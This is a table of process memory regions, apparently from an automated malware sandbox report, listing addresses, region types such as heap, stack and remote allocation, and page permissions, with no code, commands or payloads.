|
||
|
46C0000
|
heap
|
page read and write
|
||
|
7780000
|
trusted library allocation
|
page read and write
|
||
|
1BEF5AA0000
|
heap
|
page read and write
|
||
|
8960000
|
heap
|
page read and write
|
||
|
4712000
|
heap
|
page read and write
|
||
|
2474B000
|
unclassified section
|
page execute and read and write
|
||
|
7FFD9BCA0000
|
trusted library allocation
|
page read and write
|
||
|
2EB2000
|
trusted library allocation
|
page read and write
|
||
|
21B81900000
|
heap
|
page read and write
|
||
|
8FC0000
|
direct allocation
|
page execute and read and write
|
||
|
75F7000
|
trusted library allocation
|
page read and write
|
||
|
46C1000
|
heap
|
page read and write
|
||
|
20D085A4000
|
heap
|
page read and write
|
||
|
24280000
|
direct allocation
|
page read and write
|
||
|
46C1000
|
heap
|
page read and write
|
||
|
1001C3E000
|
stack
|
page read and write
|
||
|
8200000
|
heap
|
page read and write
|
||
|
27F4000
|
heap
|
page read and write
|
||
|
2984000
|
heap
|
page read and write
|
||
|
35DF000
|
stack
|
page read and write
|
||
|
3EE0000
|
remote allocation
|
page execute and read and write
|
||
|
8BE2000
|
heap
|
page read and write
|
||
|
46E3000
|
heap
|
page read and write
|
||
|
1BEDD425000
|
heap
|
page read and write
|
||
|
4740000
|
heap
|
page read and write
|
||
|
1BEDD5A0000
|
heap
|
page read and write
|
||
|
6820000
|
remote allocation
|
page execute and read and write
|
||
|
8AA0000
|
direct allocation
|
page read and write
|
||
|
8B79000
|
heap
|
page read and write
|
||
|
2984000
|
heap
|
page read and write
|
||
|
7FFD9BB62000
|
trusted library allocation
|
page read and write
|
||
|
1BEED761000
|
trusted library allocation
|
page read and write
|
||
|
4CB6000
|
heap
|
page read and write
|
||
|
10015ED000
|
stack
|
page read and write
|
||
|
100298E000
|
stack
|
page read and write
|
||
|
31B5000
|
heap
|
page read and write
|
||
|
4CB3000
|
heap
|
page read and write
|
||
|
2E80000
|
trusted library allocation
|
page read and write
|
||
|
2984000
|
heap
|
page read and write
|
||
|
46D9000
|
heap
|
page read and write
|
||
|
24270000
|
direct allocation
|
page read and write
|
||
|
8300000
|
trusted library allocation
|
page execute and read and write
|
||
|
21B8195A000
|
heap
|
page read and write
|
||
|
5B07000
|
trusted library allocation
|
page read and write
|
||
|
27F4000
|
heap
|
page read and write
|
||
|
1BEDD420000
|
heap
|
page read and write
|
||
|
8BCA000
|
heap
|
page read and write
|
||
|
1BEDF596000
|
trusted library allocation
|
page read and write
|
||
|
46D9000
|
heap
|
page read and write
|
||
|
46D2000
|
heap
|
page read and write
|
||
|
323E000
|
stack
|
page read and write
|
||
|
7FFD9BCB0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B984000
|
trusted library allocation
|
page read and write
|
||
|
4A10000
|
heap
|
page execute and read and write
|
||
|
1BEDD430000
|
trusted library allocation
|
page read and write
|
||
|
1BEDDD95000
|
trusted library allocation
|
page read and write
|
||
|
4A20000
|
remote allocation
|
page execute and read and write
|
||
|
27F4000
|
heap
|
page read and write
|
||
|
1BEF5B62000
|
heap
|
page read and write
|
||
|
46C1000
|
heap
|
page read and write
|
||
|
2A50000
|
heap
|
page read and write
|
||
|
31B4000
|
heap
|
page read and write
|
||
|
88F0000
|
direct allocation
|
page read and write
|
||
|
20D08B80000
|
heap
|
page read and write
|
||
|
3750000
|
heap
|
page read and write
|
||
|
46F9000
|
heap
|
page read and write
|
||
|
1BEF5B5D000
|
heap
|
page read and write
|
||
|
20D06BD9000
|
heap
|
page read and write
|
||
|
34DE000
|
stack
|
page read and write
|
||
|
20D06A70000
|
heap
|
page read and write
|
||
|
8B8E000
|
heap
|
page read and write
|
||
|
2A28000
|
heap
|
page read and write
|
||
|
1BEDD6E0000
|
heap
|
page execute and read and write
|
||
|
20D085A4000
|
heap
|
page read and write
|
||
|
5E20000
|
remote allocation
|
page execute and read and write
|
||
|
27F4000
|
heap
|
page read and write
|
||
|
20D06BB9000
|
heap
|
page read and write
|
||
|
46D4000
|
heap
|
page read and write
|
||
|
56C3BFF000
|
stack
|
page read and write
|
||
|
7FFD9BB31000
|
trusted library allocation
|
page read and write
|
||
|
20D06BCB000
|
heap
|
page read and write
|
||
|
20D06BB9000
|
heap
|
page read and write
|
||
|
8965000
|
heap
|
page read and write
|
||
|
4CB1000
|
heap
|
page read and write
|
||
|
46CD000
|
heap
|
page read and write
|
||
|
46DE000
|
heap
|
page read and write
|
||
|
75A0000
|
trusted library allocation
|
page read and write
|
||
|
100187E000
|
stack
|
page read and write
|
||
|
45D000
|
system
|
page execute and read and write
|
||
|
242DE000
|
stack
|
page read and write
|
||
|
241BF000
|
stack
|
page read and write
|
||
|
27F4000
|
heap
|
page read and write
|
||
|
1BEDF01B000
|
trusted library allocation
|
page read and write
|
||
|
2E40000
|
trusted library allocation
|
page read and write
|
||
|
23E90000
|
heap
|
page read and write
|
||
|
8AC0000
|
direct allocation
|
page read and write
|
||
|
7FFD9BC60000
|
trusted library allocation
|
page read and write
|
||
|
283A000
|
stack
|
page read and write
|
||
|
20D06B4F000
|
heap
|
page read and write
|
||
|
7FFD9BA40000
|
trusted library allocation
|
page execute and read and write
|
||
|
8BFA000
|
heap
|
page read and write
|
||
|
24BEA000
|
heap
|
page read and write
|
||
|
46DB000
|
heap
|
page read and write
|
||
|
24B89000
|
heap
|
page read and write
|
||
|
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
|
1001E3E000
|
stack
|
page read and write
|
||
|
46C6000
|
heap
|
page read and write
|
||
|
7FFD9BC00000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA3C000
|
trusted library allocation
|
page execute and read and write
|
||
|
6EAD000
|
stack
|
page read and write
|
||
|
10019FE000
|
stack
|
page read and write
|
||
|
21B81800000
|
heap
|
page read and write
|
||
|
25000000
|
heap
|
page read and write
|
||
|
20D06BB6000
|
heap
|
page read and write
|
||
|
1BEDDF68000
|
trusted library allocation
|
page read and write
|
||
|
1BEDBB6C000
|
heap
|
page read and write
|
||
|
20D06BCB000
|
heap
|
page read and write
|
||
|
46D0000
|
heap
|
page read and write
|
||
|
23FFC000
|
stack
|
page read and write
|
||
|
4891000
|
heap
|
page read and write
|
||
|
8240000
|
heap
|
page read and write
|
||
|
2431F000
|
stack
|
page read and write
|
||
|
9B00000
|
direct allocation
|
page execute and read and write
|
||
|
8594000
|
heap
|
page read and write
|
||
|
1BEDD750000
|
heap
|
page execute and read and write
|
||
|
474F000
|
heap
|
page read and write
|
||
|
76BF000
|
stack
|
page read and write
|
||
|
704E000
|
stack
|
page read and write
|
||
|
1BEEDA58000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BBE0000
|
trusted library allocation
|
page read and write
|
||
|
20D06AF0000
|
heap
|
page read and write
|
||
|
1001B7E000
|
stack
|
page read and write
|
||
|
8900000
|
direct allocation
|
page read and write
|
||
|
20D08584000
|
heap
|
page read and write
|
||
|
4A0F000
|
stack
|
page read and write
|
||
|
73FD000
|
heap
|
page read and write
|
||
|
77A0000
|
trusted library allocation
|
page read and write
|
||
|
20D085C6000
|
heap
|
page read and write
|
||
|
27F0000
|
heap
|
page read and write
|
||
|
1BEDDF7F000
|
trusted library allocation
|
page read and write
|
||
|
24776000
|
direct allocation
|
page execute and read and write
|
||
|
81F7000
|
stack
|
page read and write
|
||
|
1BEDBB70000
|
heap
|
page read and write
|
||
|
7820000
|
trusted library allocation
|
page read and write
|
||
|
8BE2000
|
heap
|
page read and write
|
||
|
20D08584000
|
heap
|
page read and write
|
||
|
7620000
|
trusted library allocation
|
page read and write
|
||
|
50F000
|
stack
|
page read and write
|
||
|
1002B8B000
|
stack
|
page read and write
|
||
|
2D2E000
|
stack
|
page read and write
|
||
|
7FFD9BBA0000
|
trusted library allocation
|
page read and write
|
||
|
24810000
|
heap
|
page read and write
|
||
|
20D06DBE000
|
heap
|
page read and write
|
||
|
8620000
|
remote allocation
|
page execute and read and write
|
||
|
26DC000
|
stack
|
page read and write
|
||
|
20D06B65000
|
heap
|
page read and write
|
||
|
6FCD000
|
stack
|
page read and write
|
||
|
20D06BBB000
|
heap
|
page read and write
|
||
|
26FB000
|
stack
|
page read and write
|
||
|
46DE000
|
heap
|
page read and write
|
||
|
73DE000
|
heap
|
page read and write
|
||
|
2E70000
|
trusted library allocation
|
page read and write
|
||
|
20D085A4000
|
heap
|
page read and write
|
||
|
76FE000
|
stack
|
page read and write
|
||
|
7FFD9BB50000
|
trusted library allocation
|
page execute and read and write
|
||
|
11D000
|
stack
|
page read and write
|
||
|
7220000
|
remote allocation
|
page execute and read and write
|
||
|
46C0000
|
heap
|
page read and write
|
||
|
244AE000
|
stack
|
page read and write
|
||
|
20D06B43000
|
heap
|
page read and write
|
||
|
1BEF5D64000
|
heap
|
page read and write
|
||
|
880E000
|
stack
|
page read and write
|
||
|
8760000
|
trusted library allocation
|
page read and write
|
||
|
2984000
|
heap
|
page read and write
|
||
|
20D06B1C000
|
heap
|
page read and write
|
||
|
2984000
|
heap
|
page read and write
|
||
|
7FFD9BC50000
|
trusted library allocation
|
page read and write
|
||
|
8BE0000
|
heap
|
page read and write
|
||
|
20D08580000
|
heap
|
page read and write
|
||
|
24A02000
|
heap
|
page read and write
|
||
|
7590000
|
heap
|
page execute and read and write
|
||
|
46D0000
|
heap
|
page read and write
|
||
|
2A20000
|
heap
|
page read and write
|
||
|
46CF000
|
heap
|
page read and write
|
||
|
27F4000
|
heap
|
page read and write
|
||
|
8AF0000
|
direct allocation
|
page read and write
|
||
|
245AC000
|
stack
|
page read and write
|
||
|
46D0000
|
heap
|
page read and write
|
||
|
20D06A40000
|
heap
|
page read and write
|
||
|
2984000
|
heap
|
page read and write
|
||
|
46C1000
|
heap
|
page read and write
|
||
|
20D06B1B000
|
heap
|
page read and write
|
||
|
24B11000
|
heap
|
page read and write
|
There are 832 hidden memdumps, click here to show them.